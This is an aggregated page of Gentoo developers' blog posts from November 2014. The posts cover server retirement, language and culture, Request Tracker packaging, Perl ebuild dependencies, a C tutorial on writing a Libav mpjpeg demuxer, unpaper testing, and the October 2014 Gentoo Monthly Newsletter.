
Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Zack Medico

Last updated:
November 20, 2014, 20:22 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

November 20, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
RIP ns2 (November 20, 2014, 12:39 UTC)

Today we shut down our oldest running Gentoo Linux production server: ns2.

Obviously this machine was happily spreading our DNS records around the world, but what's remarkable about it is that it had been doing so for 2717 straight days!

$ uptime
 13:00:45 up 2717 days,  2:20,  1 user,  load average: 0.13, 0.04, 0.01

As I mentioned when we shut down stabber, our beloved firewall, our company has been running Gentoo Linux servers in production for a long time now, and we're always a bit sad when we have to power off one of them.

As usual, I want to take this chance to thank everyone contributing to Gentoo Linux! Without our collective work, none of this would have been possible.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Languages, native speakers, culture (November 20, 2014, 05:37 UTC)

People who follow me probably know already that I'm not a native English speaker. Those who don't but will read this whole post will probably notice it by the end of it, just by my style, even if I were not to say it right at the start as I did.

It's not easy for me and it's often not easy for my teammates, especially so when they are native speakers. It's too easy for the both of us to underestimate or overestimate, at the same time sometimes, how much information we're conveying with a given phrase.

Something might sound absolutely rude in English to a native speaker, but when I was forming my thought in my head it was intended to be much softer, even kind. Or the other way around: it might be actually quite polite in English, and my interpretation of it would be, to me, much ruder. And this is neither an easy nor a quick problem to solve; I have been working within English-based communities for a long while – this weblog is almost ten years old! – and still to this day the confusion is not completely gone.

It's interestingly sometimes easier to interact with other non-native speakers because we realize the disconnect, but other times it is even harder because one or the other is not making the right amount of effort. I find it interestingly easier to talk with speakers of other Latin languages (French, Spanish, Portuguese), as the words and expressions are close enough that it can be easy to port them over — with a colleague and friend who's a native French speaker, we got to the point where it's sometimes faster to tell the other a word in our own language, rather than trying to go to English and back again; I promised him and other friends that I'll try to learn proper French.

It is not limited to language; culture is also connected: I found that there are many connections between Italian and Balkan culture, sometimes in niches where nobody would have expected them to creep up, such as rude gestures — the "umbrella gesture" seems to work just as well for Serbs as it does for Italians. This is less obvious when interacting with people exclusively online, but it is something useful when meeting people face to face.

I can only expect that newcomers – whether they are English speakers who have never worked closely with foreigners, or people whose main language is not English and who are doing their best to communicate in this language for the first time – will have a hard time.

This is not just a matter of lacking grammar or vocabulary: languages and societal customs are often interleaved and shape each other, so not understanding someone else's language very well may also mean not understanding their society and thus their point of view, and I would argue that points of view are everything.

I will give an example, but please remember I'm clearly not a philologist, so I may be misspeaking; please be gentle with me. Some months ago, I've been told that English is a sexist language. While there wasn't a formal definition or reasoning behind that statement, I've been pointed at the fact that you have to use "he" or "she" when talking about a third party.

I found this funny: not only do you have to do so in Italian when talking about a third party, you also have to do so when talking about a second party (you) and even about a first party (me) — indeed, most adjectives and verbs require a gender. And while English can cop out with the singular "they", this does not apply to Italian as easily. You can use a generic, plural "you", but the words still need a gender — it usually becomes feminine to match "your persons".

Because of the need for a gender in words, it is common to assume the male gender as a "default" in Italian; some documentation, especially paperwork from the public administration, will use the equivalent of "he/she" in the form of "signore/a", but it becomes cumbersome if you're writing something longer than a bank form, as every single word needs a different suffix.

I'm not trying to defend the unfortunate common mistake of assuming a male gender when talking about "the user" or any other actor in a discussion, but I think it's generally a bad idea to assume that people have a perfect understanding of the language and thus to assign maliciousness where there is simple naïve ignorance, as was the case with Lennart, systemd and the male pronouns. I know I try hard to use the singular "they", and I know I fall short of it too many times.

But the main point I'm trying to get across here is that yes, it's not easy, in this world that keeps getting smaller, to avoid the shocking contrast of different languages and cultures. And it can't be just one side accommodating to this; we all have to make an effort, by understanding the other side's limits, and by brokering among sides that would otherwise be talking past each other.

It's not easy, and it takes time, and effort. But I think it's all worth it.

Jeremy Olexa a.k.a. darkside (homepage, bugs)
2005 Volkswagen Jetta Fuse Diagram (November 20, 2014, 03:44 UTC)

It is surprisingly hard to find this fuse diagram online. I actually had the diagram in the glove box of my car, but it is cold out and I didn't want to sit outside reading the manual. I went in trying to find the source of my rear window defroster failure and found the fuse blown and "melted" to the plastic. I broke the fuse when I removed it and then replaced it with a spare. It looks like the previous owner used a 30A fuse when it should have been 25A. Anyway, it works like a charm now – ready for winter.

[Images: fuse diagram, fuse descriptions, example fuses]

November 19, 2014
Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
Request Tracker (November 19, 2014, 15:52 UTC)

So, I’ve kind of taken over Request Tracker (bestpractical.com).

Initially I took it because I'm interested in using RT at work to track customer service emails. All I did at the time was bump the version and remove old, insecure versions from the tree.

However, as I’ve finally gotten around to working on getting it setup, I’ve discovered there were a lot of issues that had gone unreported.

The intention is for RT to run out of its virtual host root, like /var/www/localhost/rt-4.2.9/bin/rt, configured by /var/www/localhost/rt-4.2.9/etc/RT_SiteConfig.pm, and for it to reference any supplementary packages with ${VHOST_ROOT} as its root. However, because of a broken install process and a broken hook script used by webapp-config, that didn't happen. Further, the rt_apache.conf we included was outdated by a few years, which in itself isn't a bad thing, except that it was wrong for RT 4+.

I spent much longer than I care to admit trying to figure out why my settings weren't sticking when I edited RT_SiteConfig.pm. I was trying to run RT under its own path rather than on a subdomain, but Set($WebPath, '/rt') wasn't doing what it should.

It also complained about not being able to write to /usr/share/webapps/rt/rt-4.2.9/data/mason_data/obj, which clearly wasn’t right.

Once I tried moving RT_SiteConfig.pm to /usr/share/webapps/rt/rt-4.2.9/etc/, and chmod and chown on ../data/mason_data/obj, everything worked as it should.
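For reference, a minimal RT_SiteConfig.pm along these lines is enough to get going; the host and database values below are placeholders, not my actual setup:

# /usr/share/webapps/rt/rt-4.2.9/etc/RT_SiteConfig.pm -- minimal sketch, placeholder values
Set($rtname, 'example.com');
Set($Organization, 'example.com');
Set($WebDomain, 'www.example.com');
Set($WebPath, '/rt');            # serve RT under a path instead of a subdomain
Set($DatabaseType, 'Pg');
Set($DatabaseName, 'rt4');
Set($DatabaseUser, 'rt');
1;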

Knowing this was wrong, and that it would prevent anyone using our package from having multiple installations, aka vhosts, I set out to fix it.

It was a descent into madness. Things I expected to happen did not. Things that shouldn’t have been a problem were. Much of the trouble I had circled around webapp-config and webapp.eclass.

But, I prevailed, and now you can really have multiple RT installations side-by-side. Also, I’ve added an article (wiki.gentoo.org) to our wiki with updated instructions on getting RT up and running.

Caveat: I didn’t use FastCGI, so that part may be wrong still, but mod_perl is good to go.

November 16, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)

After several weeks of downtime (primarily my fault), rsync1.de.gentoo.org is now back online.
As before, the complete repository is served from a RAM disk, so the mirror is relatively fast.

# rsync --list-only rsync://rsync1.de.gentoo.org/gentoo-portage/
drwxr-xr-x          3,480 2014/11/16 16:01:19 .
-rw-r--r--            121 2014/01/01 01:31:01 header.txt
-rw-r--r--          3,658 2014/08/18 21:01:02 skel.ChangeLog
-rw-r--r--          8,119 2014/08/30 12:01:02 skel.ebuild
-rw-r--r--          1,231 2014/08/18 21:01:02 skel.metadata.xml
drwxr-xr-x            860 2014/11/16 16:01:02 app-accessibility
drwxr-xr-x          4,800 2014/11/16 16:01:03 app-admin
drwxr-xr-x            100 2014/11/16 16:01:03 app-antivirus
[..]
drwxr-xr-x          1,240 2014/11/16 16:01:21 x11-wm
drwxr-xr-x            340 2014/11/16 16:01:21 xfce-base
drwxr-xr-x          1,340 2014/11/16 16:01:21 xfce-extra

The hardware underneath is sponsored by Manitu.

Introducing Gambit to Gentoo (November 16, 2014, 14:50 UTC)

Hi!

I would like to introduce you to Gambit, a rather young Qt-based chess UI with excellent usability and its very own engine.

It has been living in the betagarden overlay while maturing and just hit the Gentoo main repository.
Install it with

emerge -av games-board/gambit

as usual.

November 15, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
RDepending on Perl itself (November 15, 2014, 17:36 UTC)

Writing correct dependency specifications is an art in itself. So, here's a small guide for Gentoo developers on how to specify runtime dependencies on dev-lang/perl. First, the general rule.
Check the following two things: 1) does your package link anywhere against libperl.so, and 2) does your package install any Perl modules into Perl's vendor directory (e.g., /usr/lib64/perl5/vendor_perl/5.20.1/)? If at least one of these two questions is answered with yes, you need a slot operator in your dependency string, i.e. "dev-lang/perl:=". Obviously, your ebuild will have to be EAPI=5 for that. If neither 1) nor 2) is the case, "dev-lang/perl" is enough.
Now, with eclasses. If you use perl-module.eclass or perl-app.eclass, two variables control the automatic adding of dependencies. GENTOO_DEPEND_ON_PERL sets whether the eclass automatically adds a dependency on Perl, and defaults to yes in both cases. GENTOO_DEPEND_ON_PERL_SUBSLOT controls whether the slot operator ":=" is used. It defaults to yes in perl-module.eclass and to no in perl-app.eclass. (This is actually the only difference between the two eclasses.) The idea behind that is that a Perl module package always installs modules into vendor_dir, while an application can have its own separate installation path for its modules, or not install any modules at all.
In many cases, if a package installs Perl modules you'll need Perl at build time as well since the module build system is written in Perl. If a package links to Perl, that is obviously needed at build time too.

So, summarizing:
eclass               | 1) or 2) true                          | 1) false, 2) false
---------------------+----------------------------------------+---------------------------------------
none                 | "dev-lang/perl:=" needed in RDEPEND,   | "dev-lang/perl" needed in RDEPEND,
                     | most likely also in DEPEND             | maybe also in DEPEND
perl-module.eclass   | no need to do anything                 | GENTOO_DEPEND_ON_PERL_SUBSLOT=no
                     |                                        | possible before inherit
perl-app.eclass      | GENTOO_DEPEND_ON_PERL_SUBSLOT=yes      | no need to do anything
                     | needed before inherit                  |
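To make this concrete, here is a purely hypothetical perl-app ebuild sketch (the package name, URLs and metadata are made up) for an application that keeps its Perl modules in a private directory, so the plain dependency without the slot operator is what the eclass generates:

# Hypothetical app-misc/frobnicate-1.0.ebuild -- illustration only.
# The application installs its Perl modules into its own private directory,
# so no := slot operator on dev-lang/perl is needed; perl-app.eclass already
# defaults GENTOO_DEPEND_ON_PERL_SUBSLOT to no and adds dev-lang/perl itself
# (GENTOO_DEPEND_ON_PERL=yes is the default).
EAPI=5

inherit perl-app

DESCRIPTION="Example Perl application (hypothetical)"
HOMEPAGE="https://example.org/frobnicate"
SRC_URI="https://example.org/${P}.tar.gz"

LICENSE="GPL-2"
SLOT="0"
KEYWORDS="~amd64 ~x86"

# If this package linked against libperl.so or installed into vendor_perl,
# we would instead set GENTOO_DEPEND_ON_PERL_SUBSLOT=yes before the inherit
# (or use perl-module.eclass) to get the dev-lang/perl:= dependency.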

Luca Barbato a.k.a. lu_zero (homepage, bugs)
Making a new demuxer (November 15, 2014, 13:40 UTC)

Maxim asked me to check a stream from a security camera that he could not decode with avconv without forcing the format to mjpeg.

Mysterious stream

Since it is served over HTTP, the first step was checking the MIME type. Time to use curl -I.

# curl -I "http://host/some.cgi?user=admin&pwd=pwd" | grep Content-Type

Interestingly enough, it is multipart/x-mixed-replace:

Content-Type: multipart/x-mixed-replace;boundary=object-ipcamera

Basically the cgi sends jpeg images one after the other; we even have an (old and ugly) muxer for it!

Time to write a demuxer.

Libav demuxers

We already have some documentation on how to write a demuxer, but it is not complete, so this blogpost will provide an example.

Basics

Libav code is quite object oriented: every component is a C structure containing a description of it and pointers to a set of functions, and there are fixed patterns that make it easier to fit new code in.

Every major library has an all${components}.c in which the components are registered to be used. In our case we talk about libavformat so we have allformats.c.

The components are built according to CONFIG_${name}_${component} variables generated by configure. The actual code resides in the ${component} directory with a pattern such as ${name}.c, or ${name}dec.c/${name}enc.c if both demuxer and muxer are available.

The code can be split into multiple files if it starts growing beyond 500-1000 LOC.

Registration

We have some REGISTER_ macros that abstract some logic to make every component selectable at configure time since in Libav you can enable/disable every muxer, demuxer, codec, IO/protocol from configure.

We already had a muxer for the format.

    REGISTER_MUXER   (MPJPEG,           mpjpeg);

Now we register both in a single line:

    REGISTER_MUXDEMUX(MPJPEG,           mpjpeg);

The all${components} files are parsed by configure to generate the appropriate Makefile and C definitions. On the next configure run we'll get a new CONFIG_MPJPEG_DEMUXER variable in config.mak and config.h.

Now we can add to libavformat/Makefile a line like

OBJS-$(CONFIG_MPJPEG_DEMUXER)            += mpjpegdec.o

and put our mpjpegdec.c in libavformat and we are ready to write some code!

Demuxer structure

Usually I start putting down a skeleton file with the bare minimum:

The AVInputFormat and the core _read_probe, _read_header and _read_packet callbacks.

#include "avformat.h"

static int ${name}_read_probe(AVProbeData *p)
{
    return 0;
}

static int ${name}_read_header(AVFormatContext *s)
{
    return AVERROR(ENOSYS);
}

static int ${name}_read_packet(AVFormatContext *s, AVPacket *pkt)
{
    return AVERROR(ENOSYS);
}

AVInputFormat ff_${name}_demuxer = {
    .name           = "${name}",
    .long_name      = NULL_IF_CONFIG_SMALL("Longer ${name} description"),
    .read_probe     = ${name}_read_probe,
    .read_header    = ${name}_read_header,
    .read_packet    = ${name}_read_packet,
};

I make all the functions return a no-op value.

_read_probe

This function will be called by the av_probe_input functions; it receives some probe information in the form of a buffer. The function returns a score between 0 and 100; AVPROBE_SCORE_MAX, AVPROBE_SCORE_MIME and AVPROBE_SCORE_EXTENSION are provided to make the expected confidence more evident. 0 means that we are sure that the probed stream is not parsable by this demuxer.

_read_header

This function will be called by avformat_open_input. It reads the initial format information (e.g. number and kind of streams) when available; in this function the initial set of streams should be mapped with avformat_new_stream. It must return 0 on success. The skeleton is made to return ENOSYS so it can be run and just exit cleanly.

_read_packet

This function will be called by av_read_frame. It should return an AVPacket containing the demuxed data as contained in the bytestream. It will be parsed and collated (or split) into a frame's worth of data by the optional parsers. It must return 0 on success. The skeleton again returns ENOSYS.

Implementation

Now let’s implement the mpjpeg support! The format in itself is quite simple:
- a boundary line starting with --
- a Content-Type line stating image/jpeg.
- a Content-Length line with the actual buffer length.
- the jpeg data
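Putting those pieces together, a captured stream looks roughly like this (the boundary name is the one from the curl output above; the lengths are made up and the JPEG payloads are elided):

--object-ipcamera
Content-Type: image/jpeg
Content-Length: 34567

<JPEG data, 34567 bytes>
--object-ipcamera
Content-Type: image/jpeg
Content-Length: 35012

<JPEG data, ...>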

Probe function

Basically we just want to check whether the Content-Type is what we expect, so we go over the lines (\r\n-separated) and check if there is a Content-Type tag with the value image/jpeg.

static int get_line(AVIOContext *pb, char *line, int line_size)
{
    int i, ch;
    char *q = line;

    for (i = 0; !pb->eof_reached; i++) {
        ch = avio_r8(pb);
        if (ch == '\n') {
            if (q > line && q[-1] == '\r')
                q--;
            *q = '\0';

            return 0;
        } else {
            if ((q - line) < line_size - 1)
                *q++ = ch;
        }
    }

    if (pb->error)
        return pb->error;
    return AVERROR_EOF;
}

static int split_tag_value(char **tag, char **value, char *line)
{
    char *p = line;

    while (*p != '\0' && *p != ':')
        p++;
    if (*p != ':')
        return AVERROR_INVALIDDATA;

    *p   = '\0';
    *tag = line;

    p++;

    while (av_isspace(*p))
        p++;

    *value = p;

    return 0;
}

static int check_content_type(char *line)
{
    char *tag, *value;
    int ret = split_tag_value(&tag, &value, line);

    if (ret < 0)
        return ret;

    if (av_strcasecmp(tag, "Content-type") ||
        av_strcasecmp(value, "image/jpeg"))
        return AVERROR_INVALIDDATA;

    return 0;
}

static int mpjpeg_read_probe(AVProbeData *p)
{
    AVIOContext *pb;
    char line[128] = { 0 };
    int ret;

    pb = avio_alloc_context(p->buf, p->buf_size, 0, NULL, NULL, NULL, NULL);
    if (!pb)
        return AVERROR(ENOMEM);

    while (!pb->eof_reached) {
        ret = get_line(pb, line, sizeof(line));
        if (ret < 0)
            break;

        ret = check_content_type(line);
        if (!ret)
            return AVPROBE_SCORE_MAX;
    }

    return 0;
}

Here we are using avio to be able to reuse get_line later.

Reading the header

The format is pretty much header-less; we just check for the boundary for now and set up the minimum amount of information regarding the stream: media type, codec id and frame rate. The boundary is, by specification, at most 70 characters, with -- as the initial marker.

static int mpjpeg_read_header(AVFormatContext *s)
{
    MPJpegContext *mp = s->priv_data;
    AVStream *st;
    char boundary[70 + 2 + 1];
    int ret;

    ret = get_line(s->pb, boundary, sizeof(boundary));
    if (ret < 0)
        return ret;

    if (strncmp(boundary, "--", 2))
        return AVERROR_INVALIDDATA;

    st = avformat_new_stream(s, NULL);

    st->codec->codec_type = AVMEDIA_TYPE_VIDEO;
    st->codec->codec_id   = AV_CODEC_ID_MJPEG;

    avpriv_set_pts_info(st, 60, 1, 25);

    return 0;
}

Reading packets

Even this function is quite simple; please note that AVFormatContext provides an
AVIOContext. The bulk of the function boils down to reading the size of the frame,
allocating a packet using av_new_packet, and filling it using avio_read.

static int parse_content_length(char *line)
{
    char *tag, *value;
    int ret = split_tag_value(&tag, &value, line);
    long int val;

    if (ret < 0)
        return ret;

    if (av_strcasecmp(tag, "Content-Length"))
        return AVERROR_INVALIDDATA;

    val = strtol(value, NULL, 10);
    if (val == LONG_MIN || val == LONG_MAX)
        return AVERROR(errno);
    if (val > INT_MAX)
        return AVERROR(ERANGE);
    return val;
}

static int mpjpeg_read_packet(AVFormatContext *s, AVPacket *pkt)
{
    char line[128];
    int ret, size;

    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        return ret;

    ret = check_content_type(line);
    if (ret < 0)
        return ret;

    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        return ret;

    size = parse_content_length(line);
    if (size < 0)
        return size;

    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        goto fail;

    ret = av_new_packet(pkt, size);
    if (ret < 0)
        return ret;

    ret = avio_read(s->pb, pkt->data, size);
    if (ret < 0)
        goto fail;

    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        goto fail;

    // Consume the boundary marker
    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        goto fail;

    return ret;

fail:
    av_free_packet(pkt);
    return ret;
}
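Once the demuxer is registered and built, the camera stream from the beginning of the post should be usable directly, along these lines (the host and query string are the placeholders from the original example):

# probe and remux the camera stream without forcing the input format
avconv -i "http://host/some.cgi?user=admin&pwd=pwd" -c copy capture.mkv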

What next

For now I have walked you through the fundamentals; hopefully next week I'll show you some additional features I'll need to implement in this simple demuxer to make it land in Libav: AVOptions to make it possible to override the framerate, and some additional code to be able to do without Content-Length and just use the boundary line.

PS: wordpress support for syntax highlighting is quite subpar; if somebody has a blog engine that can use pygments or equivalent, please tell me and I'll switch to it.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Small differences don't matter (to unpaper) (November 15, 2014, 04:53 UTC)

After my challenge with the fused multiply-add instructions I managed to find some time to write a new test utility. It's written ad hoc for unpaper but it can probably be used for other things too. It's trivial and stupid but it got the job done.

What it does is simple: it loads both a golden and a result image file, compares the size and format, and then goes through all the bytes to identify how many differences there are between them. If less than 0.1% of the image surface changed, it considers the test a pass.
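Conceptually the whole check is little more than this loop (a minimal sketch of the idea, not the actual utility; it assumes the two images have already been decoded into byte buffers of equal size):

#include <stdbool.h>
#include <stddef.h>

/* Count the bytes that differ between the golden and the result image and
 * consider the comparison a pass if less than 0.1% of them changed. */
static bool images_match(const unsigned char *golden,
                         const unsigned char *result,
                         size_t size)
{
    size_t differences = 0;
    size_t i;

    for (i = 0; i < size; i++)
        if (golden[i] != result[i])
            differences++;

    return differences * 1000 < size;  /* less than 0.1% of the bytes differ */
}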

It's not a particularly nice system, especially as it requires me to bundle some 180MB of golden files (they compress to just about 10 MB so it's not a big deal), but it's a strict improvement compared to what I had before, which is good.

This change actually allowed me to explore one change that I had abandoned before because it resulted in non-pixel-perfect results. In particular, unpaper now uses single-precision floating point all over, rather than doubles. This is because the slight imperfections caused by this change are not relevant enough to warrant the ever-so-slight loss in performance due to the bigger variables.

But even up to here, there is very little gain in performance. Sure, some calculations can be faster this way, but we're still using the same set of AVX/FMA instructions. This is unfortunate: unless you start rewriting the algorithms used for searching for edges or rotations, there is no gain to be made by changing the size of the variables. When I converted unpaper to use libavcodec, I decided to make the code as simple and as stupid as I could, as that meant I could have a baseline to improve from, but I'm not sure what the best way to improve it is, now.

I still have a branch that uses OpenMP for the processing, but since most of the filters applied are dependent on each other it does not work very well. Per-row processing gets slightly better results but they are really minimal as well. I think the most interesting parallel processing low-hanging fruit would be to execute processing in parallel on the two pages after splitting them from a single sheet of paper. Unfortunately, the loops used to do that processing right now are so complicated that I'm not looking forward to touch them for a long while.

I tried some basic profile-guided optimization runs, just to figure out what needs to be improved, and compared with codiff a proper release and a PGO version trained on the tests. Unfortunately the results are a bit vague, which means I'll probably have to profile it properly if I want to get data out of it. If you're curious, here is the output of rbelf-size -D on the unpaper binary when built normally, with profile-guided optimisation, with link-time optimisation, and with both profile-guided and link-time optimisation:

% rbelf-size -D ../release/unpaper ../release-pgo/unpaper ../release-lto/unpaper ../release-lto-pgo/unpaper
    exec         data       rodata        relro          bss     overhead    allocated   filename
   34951         1396        22284            0        11072         3196        72899   ../release/unpaper
   +5648         +312         -192           +0         +160           -6        +5922   ../release-pgo/unpaper
    -272           +0        -1364           +0         +144          -55        -1547   ../release-lto/unpaper
   +7424         +448        -1596           +0         +304          -61        +6519   ../release-lto-pgo/unpaper

It's unfortunate that GCC does not give you any diagnostics on what it's trying to achieve when doing LTO; it would be interesting to see if you could steer the compiler to produce better code without it as well.

Anyway, enough with the micro-optimisations for now. If you want to make unpaper faster, feel free to send me pull requests for it; I'll be glad to take a look at them!

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Having fun with networking (November 15, 2014, 04:14 UTC)

Since the last minor upgrade my notebook has been misbehaving in funny ways.
I presumed that it was NetworkManager being itself, but ... this is even more fun. To quote from the manpage:

    If the hostname is currently blank, (null) or localhost, or force_hostname
    is YES or TRUE or 1 then dhcpcd sets the hostname to the one supplied by
    the DHCP server.
Guess what. Now my hostname is 192.168.0.7, I mean 192.168.0.192.168.0.7, err...
And as a bonus this even breaks X in funny ways so that starting new apps becomes impossible. The fix?
Now the hostname is set to "localhorst". Because that's the name of the machine!111 (It doesn't have an explicit name, so localhost used to be ok)
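For reference, on a Gentoo/OpenRC box the static hostname normally lives in /etc/conf.d/hostname, so the fix presumably boils down to something like:

# /etc/conf.d/hostname
hostname="localhorst"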

November 14, 2014
Gentoo Monthly Newsletter: October 2014 (November 14, 2014, 19:30 UTC)

Gentoo News

Council News

The council addressed a number of issues this month. The change with the biggest long-term significance was clearing the way to proceed with the git migration once infra is ready. This included removing changelogs from future git commits, removing cvs headers, and simplifying our news repository format. The infra and git migration projects will coordinate the actual migration hopefully in the not-so-distant future.

The council also endorsed getting rid of herds, but acknowledged that there are some details that need to be worked out before pulling the plug. The bikeshedding was moved back to the lists so all could share in the fun.

There are still some concerns with the games team. The council decided to give the team more time to sort things out internally before interfering. It was acknowledged that most of the serious issues were already resolved with the decision to allow anybody to elect to make their packages a part of the games herd or not. Some QA concerns with some games were brought up, but it was felt that this is best dealt with on a per-package basis with QA/treecleaners and that games shouldn’t receive any special treatment one way or the other.

Other decisions include removing einstall from EAPI6, and approving GLEP64 (VDB caching / API). There was also a status update on multilib (nearly done), and migrating project pages to the wiki (sadly we can’t just get rid of unmigrated projects like the x86 and amd64 arches).

PYTHON_SINGLE_TARGETS updates

(by Ian Stakenvicius)

On November 7th, packages inheriting python-single-r1 got a whole lot easier for end-users to manage.

It used to be that any package supporting just one Python implementation required a python_single_target_* USE flag to be set to choose it, even if the package was only compatible with one implementation in the first place. Since November 7th, if a package is only compatible with a single supported Python version (say, python-2.7), then it no longer uses python_single_target_* USE flags and instead relies on that implementation being enabled in PYTHON_TARGETS.

The most visible change from this is package rebuilds due to the removal of a lot of PYTHON_SINGLE_TARGET flags, especially on python-2.7-only packages. However, the removal of these flags also means that setting PYTHON_SINGLE_TARGET to something other than python2_7 no longer requires all of those packages to be listed in package.use.

Portage users are also likely to notice that exceptions to PYTHON_SINGLE_TARGET that would require package.use changes are now also calculated properly by --autounmask, instead of solely being reported as an illegible REQUIRED_USE error.
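For example, with a purely illustrative configuration like the one below, python-2.7-only packages now build without any package.use entries, because python2_7 is already enabled in PYTHON_TARGETS:

# /etc/portage/make.conf (illustrative values)
PYTHON_TARGETS="python2_7 python3_3"
PYTHON_SINGLE_TARGET="python3_3"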

Gentoo Developer Moves

Summary

Gentoo is made up of 243 active developers, of which 39 are currently away.
Gentoo has recruited a total of 804 developers since its inception.

Changes

  • Yixun Lan joined the electronics team

Additions

Portage

This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 163
Packages 17876
Ebuilds 38009
Architecture Stable Testing Total % of Packages
alpha 3663 592 4255 23.80%
amd64 10926 6462 17388 97.27%
amd64-fbsd 0 1580 1580 8.84%
arm 2709 1812 4521 25.29%
arm64 565 46 611 3.42%
hppa 3103 502 3605 20.17%
ia64 3218 629 3847 21.52%
m68k 624 99 723 4.04%
mips 0 2423 2423 13.55%
ppc 6869 2479 9348 52.29%
ppc64 4381 988 5369 30.03%
s390 1445 376 1821 10.19%
sh 1625 461 2086 11.67%
sparc 4160 921 5081 28.42%
sparc-fbsd 0 319 319 1.78%
x86 11576 5402 16978 94.98%
x86-fbsd 0 3245 3245 18.15%


Security

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201410-02 perl-core/Locale-Maketext (and 1 more) Perl, Perl Locale-Maketext module: Multiple vulnerabilities 446376
201410-01 app-shells/bash Bash: Multiple vulnerabilities 523742

Package Removals/Additions

Removals

Package Developer Date
media-sound/cowbell k_f 06 Oct 2014
x11-plugins/msn-pecan voyageur 08 Oct 2014
x11-plugins/pidgin-facebookchat voyageur 08 Oct 2014
dev-perl/IO-Socket-IP dilfridge 11 Oct 2014
dev-perl/Template-Latex dilfridge 13 Oct 2014
app-emulation/emul-linux-x86-compat ulm 14 Oct 2014
app-doc/djbdns-man mjo 15 Oct 2014
app-text/unix2dos mjo 18 Oct 2014
app-text/regex idella4 29 Oct 2014
games-board/chessdb mr_bones_ 30 Oct 2014
dev-ml/async_core aballier 30 Oct 2014

Additions

Package Developer Date
net-analyzer/openvas-tools jlec 01 Oct 2014
net-p2p/bitcoin-cli blueness 02 Oct 2014
app-benchmarks/wrk vikraman 02 Oct 2014
dev-perl/Net-IPv4Addr mjo 04 Oct 2014
dev-ruby/compass-core graaff 05 Oct 2014
dev-ruby/compass-import-once graaff 05 Oct 2014
media-sound/apulse jauhien 05 Oct 2014
dev-perl/Test-Warnings zlogene 05 Oct 2014
x11-misc/rofi jer 06 Oct 2014
dev-python/parse alunduil 06 Oct 2014
dev-python/clint alunduil 07 Oct 2014
app-admin/lastpass robbat2 08 Oct 2014
dev-perl/XML-Entities dilfridge 09 Oct 2014
dev-python/Numdifftools jlec 10 Oct 2014
app-text/krop dilfridge 10 Oct 2014
net-voip/vidyodesktop prometheanfire 10 Oct 2014
kde-misc/kcm-touchpad mrueg 11 Oct 2014
dev-perl/Unicode-Normalize dilfridge 11 Oct 2014
dev-perl/Net-IDN-Encode dilfridge 11 Oct 2014
dev-perl/tkispell dilfridge 11 Oct 2014
perl-core/IO-Socket-IP dilfridge 11 Oct 2014
virtual/perl-IO-Socket-IP dilfridge 11 Oct 2014
dev-python/pyhamcrest alunduil 11 Oct 2014
dev-python/enum34 alunduil 11 Oct 2014
dev-db/postgresql titanofold 11 Oct 2014
dev-python/doublex alunduil 11 Oct 2014
dev-python/pycallgraph alunduil 12 Oct 2014
dev-python/python-termstyle alunduil 12 Oct 2014
dev-python/rednose alunduil 12 Oct 2014
dev-python/PyQt5 pesa 13 Oct 2014
net-analyzer/ipguard jer 13 Oct 2014
dev-perl/Template-Plugin-Latex dilfridge 13 Oct 2014
dev-perl/LaTeX-Driver dilfridge 14 Oct 2014
dev-perl/Pod-LaTeX dilfridge 14 Oct 2014
dev-perl/LaTeX-Encode dilfridge 14 Oct 2014
dev-perl/MooseX-FollowPBP dilfridge 14 Oct 2014
